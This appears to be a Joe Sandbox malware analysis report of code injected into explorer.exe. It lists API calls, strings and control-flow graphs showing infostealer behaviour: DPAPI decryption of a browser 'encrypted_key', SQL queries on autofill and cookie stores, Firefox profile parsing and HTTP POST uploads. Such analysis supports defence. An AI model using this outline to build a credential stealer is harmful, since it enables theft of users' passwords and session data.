                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                                                • String ID: *.*$\*.*
                                                                                                                                                                • API String ID: 232625764-1692270452
                                                                                                                                                                • Opcode ID: 522af5f339518bb5a172b36cc54bfd972d4756f35851e0238b01b457e4a8e8f4
                                                                                                                                                                • Instruction ID: e8c785a03c4e3b40a69ba3d7b45d77a64185031699de6e3a287cd37e942f5fbe
                                                                                                                                                                • Opcode Fuzzy Hash: 522af5f339518bb5a172b36cc54bfd972d4756f35851e0238b01b457e4a8e8f4
                                                                                                                                                                • Instruction Fuzzy Hash: 1B31B2303143418FCB20AB708898B6F76E9AFC5740F084A29FC5682251EB36CE09A796

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 641 c33e04-c33e11 call c31b6a 644 c33e17-c33e22 call c31c31 641->644 645 c33ed4-c33ed8 641->645 644->645 648 c33e28-c33e34 call c32fb1 644->648 651 c33e3a-c33e4f call c3123b 648->651 652 c33ec8-c33ecc 648->652 655 c33e51-c33e58 651->655 656 c33ec0-c33ec7 call c31011 651->656 652->645 658 c33e5a-c33e6a 655->658 659 c33ebf 655->659 656->652 661 c33eb8-c33eba call c31011 658->661 662 c33e6c-c33e7c RtlCompareMemory 658->662 659->656 661->659 662->661 663 c33e7e-c33ea6 CryptUnprotectData 662->663 663->661 665 c33ea8-c33ead 663->665 665->661 666 c33eaf-c33eb3 665->666 666->661
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                  • Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                  • Part of subcall function 00C31C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00C33E1E,00000000,?,00C33FA8), ref: 00C31C46
                                                                                                                                                                  • Part of subcall function 00C31C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00C33FA8), ref: 00C31C56
                                                                                                                                                                  • Part of subcall function 00C31C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00C33FA8), ref: 00C31C76
                                                                                                                                                                  • Part of subcall function 00C31C31: CloseHandle.KERNELBASE(00000000,?,00C33FA8), ref: 00C31C91
                                                                                                                                                                  • Part of subcall function 00C32FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00C33E30,00000000,00000000,?,00C33FA8), ref: 00C32FC1
                                                                                                                                                                  • Part of subcall function 00C32FB1: lstrlen.KERNEL32("encrypted_key":",?,00C33FA8), ref: 00C32FCE
                                                                                                                                                                  • Part of subcall function 00C32FB1: StrStrIA.SHLWAPI("encrypted_key":",00C8692C,?,00C33FA8), ref: 00C32FDD
                                                                                                                                                                  • Part of subcall function 00C3123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00C33E4B,00000000), ref: 00C3124A
                                                                                                                                                                  • Part of subcall function 00C3123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31268
                                                                                                                                                                  • Part of subcall function 00C3123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C31295
                                                                                                                                                                • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00C33E74
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C33E9E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                                • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                                • API String ID: 3076719866-957854035
                                                                                                                                                                • Opcode ID: ac48b3215144f3b74d2f5b46654029f4e08d54010eb223a29a0dccccf3653c58
                                                                                                                                                                • Instruction ID: 5ff6e4a9cbc7f1a0b067d84fbd476e1bed1931895291c84c6695bbe4355eb788
                                                                                                                                                                • Opcode Fuzzy Hash: ac48b3215144f3b74d2f5b46654029f4e08d54010eb223a29a0dccccf3653c58
                                                                                                                                                                • Instruction Fuzzy Hash: E8218E72614385AFD725EA688C80A7FB2EDAB84701F48092EFC51C7241EB74CF498796
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C3116F
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00C34BB6
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00C34BBF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1675517319-0
                                                                                                                                                                • Opcode ID: 9dbde3295ed9e6b6bbbf2a0a803a217f79ed7c2ca6a74159d70b1e3811040e18
                                                                                                                                                                • Instruction ID: c2d816bc8e5cf865843f316fd5a41e169ae58e42d14355e747011944559e32d7
                                                                                                                                                                • Opcode Fuzzy Hash: 9dbde3295ed9e6b6bbbf2a0a803a217f79ed7c2ca6a74159d70b1e3811040e18
                                                                                                                                                                • Instruction Fuzzy Hash: 14E0DF31820610ABC65CBB70BC0DB8FBB989F96365F14C969B6A582090CB36D9409B64
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemInfo.KERNELBASE(00C920A4,00000001,00000000,0000000A,00C83127,00C328DA,00000000,?), ref: 00C3BFFC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                • Opcode ID: ea0846dfd93bbc6da812b719bd4e642528e6975f895a8432e33eea7a5d4439cb
                                                                                                                                                                • Instruction ID: 005e30aea32b9fdff725989c172c186b3625cb611895c4191a0c415c7d79b6e7
                                                                                                                                                                • Opcode Fuzzy Hash: ea0846dfd93bbc6da812b719bd4e642528e6975f895a8432e33eea7a5d4439cb
                                                                                                                                                                • Instruction Fuzzy Hash: ECE01A317A434135EE2037B96C0FF1A25554B85F00F64CA36BF10AA1CADF9586407127

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                  • Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,00000000), ref: 00C33C6A
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33C76
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 00C33C7D
                                                                                                                                                                • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33C89
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00C33D2F
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C33D36
                                                                                                                                                                • wsprintfA.USER32 ref: 00C33D55
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C33D61
                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00C33D89
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00C33DB2
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C33DED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                                • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                                • API String ID: 2923052733-3488123210
                                                                                                                                                                • Opcode ID: 5a441455b89735b82e2bfa9e54238fbbffe3ac13a5f82293cf79604704132a78
                                                                                                                                                                • Instruction ID: 9eeb5f27b7cc23542144515f7aa3ff690183d249aa567de012779d2e569db720
                                                                                                                                                                • Opcode Fuzzy Hash: 5a441455b89735b82e2bfa9e54238fbbffe3ac13a5f82293cf79604704132a78
                                                                                                                                                                • Instruction Fuzzy Hash: 9E41C130224241AFD714BB70CC85E3F7AADEF85744F04082CF846A7252DB35DE029B6A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 348 c328f8-c328fa 349 c32900-c3291c call c31000 call c502ec 348->349 350 c32ac8-c32ada call c83848 DeleteFileW call c31011 348->350 359 c32922-c3293a call c31fa7 349->359 360 c32a8f-c32aa2 call c4fb92 lstrlen 349->360 357 c32adf-c32ae6 350->357 367 c32948-c3295f call c31fa7 359->367 368 c3293c-c32942 359->368 365 c32ac1-c32ac3 call c31011 360->365 366 c32aa4-c32abc call c31798 * 3 360->366 365->350 366->365 376 c32961-c32967 367->376 377 c3296d-c32984 call c31fa7 367->377 368->367 370 c32944 368->370 370->367 376->377 380 c32969 376->380 383 c32992-c329a7 call c31fa7 377->383 384 c32986-c3298c 377->384 380->377 388 c329b5-c329cc call c31fa7 383->388 389 c329a9-c329af 383->389 384->383 385 c3298e 384->385 385->383 393 c329da-c329e5 lstrlen 388->393 394 c329ce-c329d4 388->394 389->388 390 c329b1 389->390 390->388 395 c329eb-c329f0 lstrlen 393->395 396 c32a79-c32a85 call c502ec 393->396 394->393 397 c329d6 394->397 395->396 398 c329f6-c32a11 call c31000 395->398 396->359 402 c32a8b 396->402 397->393 404 c32a13 398->404 405 c32a1b-c32a56 call c32112 wsprintfA lstrlen 398->405 402->360 404->405 408 c32a6a-c32a74 lstrcat call c31011 405->408 409 c32a58-c32a68 call c3102f 405->409 408->396 409->408
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C32AD2
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C329E1
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C329EC
                                                                                                                                                                • wsprintfA.USER32 ref: 00C32A38
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C32A44
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C32A6C
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?), ref: 00C32A99
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                                                • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                                                • API String ID: 304071051-2605711689
                                                                                                                                                                • Opcode ID: 5a0c81920e8ac41f202e8d6607b826a1bef7693e70762f100acb6e5610348589
                                                                                                                                                                • Instruction ID: e860cff9c8fcb755bd4d651d5fd53bff04491d98624a9261f39e4a34a83f23a2
                                                                                                                                                                • Opcode Fuzzy Hash: 5a0c81920e8ac41f202e8d6607b826a1bef7693e70762f100acb6e5610348589
                                                                                                                                                                • Instruction Fuzzy Hash: 8751BD306183468FCB29EF64D890B3F77DAAF89704F08082DF8959B252DB35DD05AB56

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 484 c32cb5-c32cc7 call c31953 488 c32e17-c32e2d call c32ae9 484->488 489 c32ccd-c32d06 call c31953 call c31000 * 2 call c31b6a 484->489 500 c32df9-c32e12 call c31011 * 4 489->500 501 c32d0c-c32d1c GetPrivateProfileSectionNamesW 489->501 500->488 501->500 502 c32d22-c32d26 501->502 505 c32df5 502->505 506 c32d2c-c32d32 502->506 505->500 508 c32d36-c32d39 506->508 510 c32d3f-c32d4d StrStrIW 508->510 511 c32ded-c32df1 508->511 513 c32d53-c32d70 GetPrivateProfileStringW 510->513 514 c32dd7-c32de7 lstrlenW 510->514 511->505 513->514 516 c32d72-c32d88 GetPrivateProfileIntW 513->516 514->508 514->511 518 c32d8a-c32d9c call c31953 516->518 519 c32dcc-c32dd2 call c32ae9 516->519 523 c32db4-c32dca call c32ae9 call c31011 518->523 524 c32d9e-c32da2 518->524 519->514 523->514 525 c32da4-c32daa 524->525 526 c32dac-c32db2 524->526 525->526 526->523 526->524
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                  • Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                  • Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00C32D13
                                                                                                                                                                • StrStrIW.SHLWAPI(00000000,Profile), ref: 00C32D45
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,Path,00C8637C,?,00000FFF,?), ref: 00C32D68
                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00C32D7B
                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 00C32DD8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                                                • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                                                • API String ID: 2234428054-4107377610
                                                                                                                                                                • Opcode ID: a5763e75257a313cbe20120b71ec54f5e19828b522d61b258a75ae7588053b3b
                                                                                                                                                                • Instruction ID: 3964bc4bd2e6c42832ea945eaeeab7f7e7f20708f86d5c43e628a428925a8c7e
                                                                                                                                                                • Opcode Fuzzy Hash: a5763e75257a313cbe20120b71ec54f5e19828b522d61b258a75ae7588053b3b
                                                                                                                                                                • Instruction Fuzzy Hash: 3C317A307243029FDA24BF30985172FB6A2AFC8710F14443DF956AB292DB758D46E796

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 576 c31333-c31385 call c31000 call c3106c call c312a3 583 c313a0-c313a3 576->583 584 c31387-c3139e 576->584 586 c313aa-c313ac 583->586 587 c313b0-c313b2 584->587 586->587 588 c315cb-c315da call c31011 587->588 589 c313b8-c313ef RtlZeroMemory 587->589 593 c315c3-c315ca 589->593 594 c313f5-c3141a 589->594 593->588 597 c31420-c31456 call c310b1 594->597 598 c315bf 594->598 601 c31458 597->601 602 c3145d-c31478 597->602 598->593 601->602 604 c315b5 602->604 605 c3147e-c31483 602->605 604->598 606 c31485-c31496 605->606 607 c3149d-c314c7 call c31000 wsprintfW 605->607 606->607 610 c314e0-c31509 607->610 611 c314c9-c314cb 607->611 618 c315a5 610->618 619 c3150f-c3151b 610->619 612 c314cc-c314cf 611->612 613 c314d1-c314d6 612->613 614 c314da-c314dc 612->614 613->612 616 c314d8 613->616 614->610 616->610 620 c315ac-c315b0 call c31011 618->620 619->618 622 c31521-c31537 call c31000 619->622 620->604 626 c31539-c31544 622->626 627 c31546-c31553 call c3102f 626->627 628 c31558-c3156f 626->628 627->628 632 c31573-c3157d 628->632 633 c31571 628->633 632->626 634 c3157f-c31583 632->634 633->632 635 c31585 call c3104c 634->635 636 c3159a-c315a1 call c31011 634->636 640 c3158a-c31594 RtlMoveMemory 635->640 636->618 640->636
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                  • Part of subcall function 00C3106C: lstrlen.KERNEL32(00D61326,00000000,00000000,00000000,00C31366,75568A60,00D61326,00000000), ref: 00C31074
                                                                                                                                                                  • Part of subcall function 00C3106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00D61326,00000001,00000000,00000000), ref: 00C31086
                                                                                                                                                                  • Part of subcall function 00C312A3: RtlZeroMemory.NTDLL(?,00000018), ref: 00C312B5
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,0000003C), ref: 00C313C2
                                                                                                                                                                • wsprintfW.USER32 ref: 00C314B5
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C31594
                                                                                                                                                                Strings
                                                                                                                                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 00C314FB
                                                                                                                                                                • POST, xrefs: 00C31465
                                                                                                                                                                • Accept: */*Referer: %S, xrefs: 00C314AF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                                • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                                • API String ID: 3833683434-704803497
                                                                                                                                                                • Opcode ID: 7a7d97c17d9c0db4b2aaed966511ee031a956e66ab73ace347aa416cac7676f2
                                                                                                                                                                • Instruction ID: 61d54f30ff544d8c4f46d82b09457191bbc11ec453dd6805b17fa989f4270d0e
                                                                                                                                                                • Opcode Fuzzy Hash: 7a7d97c17d9c0db4b2aaed966511ee031a956e66ab73ace347aa416cac7676f2
                                                                                                                                                                • Instruction Fuzzy Hash: 067168B0618305AFD7149F68DC88A2FBBE9EB88344F08492DF955D7252DB30DE048B96

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 667 c3b1e5-c3b20b 668 c3b221-c3b22a 667->668 669 c3b20d-c3b218 call c3aeea 667->669 671 c3b240-c3b243 668->671 672 c3b22c-c3b237 call c3ae65 668->672 677 c3b3ea-c3b3f0 669->677 678 c3b21e 669->678 675 c3b3b9-c3b3d3 671->675 676 c3b249-c3b26b call c3a7ae 671->676 684 c3b3b4-c3b3b7 672->684 685 c3b23d 672->685 679 c3b3db-c3b3df 675->679 689 c3b296-c3b29f 676->689 690 c3b26d-c3b278 676->690 678->668 682 c3b3e1-c3b3e3 679->682 683 c3b3e8 679->683 682->683 688 c3b3e5-c3b3e7 682->688 683->677 684->675 687 c3b3d5-c3b3d8 684->687 685->671 687->679 688->683 691 c3b2a1 689->691 692 c3b2d6-c3b2ea call c36a5a 689->692 693 c3b27d-c3b291 call c3a1c6 690->693 694 c3b2a3-c3b2a7 691->694 695 c3b2a9-c3b2ad 691->695 702 c3b2f6-c3b2fd 692->702 703 c3b2ec-c3b2f1 692->703 693->684 694->692 694->695 695->684 698 c3b2b3-c3b2b9 call c3a67c 695->698 705 c3b2be-c3b2c2 698->705 706 c3b373 702->706 707 c3b2ff-c3b30e 702->707 703->684 705->692 709 c3b2c4-c3b2d4 705->709 708 c3b377-c3b37a 706->708 707->708 710 c3b310-c3b329 CreateFileMappingW 708->710 711 c3b37c 708->711 709->693 712 c3b32b-c3b357 MapViewOfFile 710->712 713 c3b37e-c3b3ab call c3a1c6 710->713 711->684 712->713 714 c3b359-c3b370 712->714 713->684 718 c3b3ad 713->718 714->706 718->684
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 00C3B31D
                                                                                                                                                                • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 00C3B34F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateMappingView
                                                                                                                                                                • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                • API String ID: 3452162329-3826999013
                                                                                                                                                                • Opcode ID: bd10e0fa37e46130545fea4643786b6f079af7fcd0fad0b3f0a334d6a57e7823
                                                                                                                                                                • Instruction ID: 49d911789605612dd423d850bd991f3f8292eb1cbe4c9ea6fb583087f672596f
                                                                                                                                                                • Opcode Fuzzy Hash: bd10e0fa37e46130545fea4643786b6f079af7fcd0fad0b3f0a334d6a57e7823
                                                                                                                                                                • Instruction Fuzzy Hash: E051BF71210701DFDB25DF18C845B2BB7E5FB84304F14892EEAA28B2A1DB70ED15CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 719 c3a40e-c3a424 720 c3a4a2-c3a4aa 719->720 721 c3a426-c3a42a 719->721 724 c3a4ae-c3a4c8 720->724 722 c3a431-c3a441 721->722 723 c3a42c-c3a42f 721->723 726 c3a443 722->726 727 c3a469-c3a4a0 memcpy 722->727 723->720 723->722 725 c3a4cc-c3a4e3 ReadFile 724->725 728 c3a4e5-c3a4ee 725->728 729 c3a524-c3a538 call c3a2aa 725->729 730 c3a445-c3a448 726->730 731 c3a44a-c3a45a memcpy 726->731 727->724 728->729 737 c3a4f0-c3a4ff call c3a250 728->737 733 c3a45d 729->733 738 c3a53e-c3a553 memset 729->738 730->727 730->731 731->733 736 c3a45f-c3a466 733->736 737->725 741 c3a501-c3a51f call c3a1c6 737->741 738->736 741->736
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$FileReadmemset
                                                                                                                                                                • String ID: winRead
                                                                                                                                                                • API String ID: 2051157613-2759563040
                                                                                                                                                                • Opcode ID: 8874635e08dbd9311c94f7843a35affbc0d1bf91b2f99eaaf7bf5f0424038f00
                                                                                                                                                                • Instruction ID: 904053e98978e966ca6bd992e2fe391d7475cfef3196b17f19cf651387f5ba0b
                                                                                                                                                                • Opcode Fuzzy Hash: 8874635e08dbd9311c94f7843a35affbc0d1bf91b2f99eaaf7bf5f0424038f00
                                                                                                                                                                • Instruction Fuzzy Hash: 5431CE72228300AFC740DE58CC8599FB7E6EFC4310F846928F89597210D6B0ED248B93

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 744 c32e30-c32e55 StrStrIW 745 c32e57-c32e6c call c319e5 744->745 746 c32ebe-c32eec call c31000 RegOpenKeyExW 744->746 753 c32e6e-c32e79 call c31bc5 745->753 754 c32ebc 745->754 751 c32f68-c32f74 call c31011 746->751 752 c32eee-c32efd 746->752 755 c32f50-c32f5c RegEnumKeyExW 752->755 762 c32eb5-c32eb7 call c31011 753->762 763 c32e7b-c32e85 call c31afe 753->763 754->746 758 c32eff-c32f26 call c31953 call c3199d call c32e30 755->758 759 c32f5e-c32f62 RegCloseKey 755->759 777 c32f2b-c32f4f call c31011 758->777 759->751 762->754 770 c32e87-c32e97 call c3199d 763->770 771 c32eae-c32eb0 call c31011 763->771 770->771 778 c32e99-c32e9f 770->778 771->762 777->755 778->771 780 c32ea0 call c32c77 778->780 780->771
                                                                                                                                                                APIs
                                                                                                                                                                • StrStrIW.KERNELBASE(?,?), ref: 00C32E4B
                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00C32EE4
                                                                                                                                                                • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C32F54
                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00C32F62
                                                                                                                                                                  • Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
                                                                                                                                                                  • Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
                                                                                                                                                                  • Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98
                                                                                                                                                                  • Part of subcall function 00C31BC5: lstrlenW.KERNEL32(00000000,00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BCC
                                                                                                                                                                  • Part of subcall function 00C31BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31BF0
                                                                                                                                                                  • Part of subcall function 00C31BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C05
                                                                                                                                                                  • Part of subcall function 00C31BC5: lstrlenW.KERNEL32(00000000,?,00C32E75,PathToExe,00000000,00000000), ref: 00C31C1C
                                                                                                                                                                  • Part of subcall function 00C31AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00C32E83,PathToExe,00000000,00000000), ref: 00C31B16
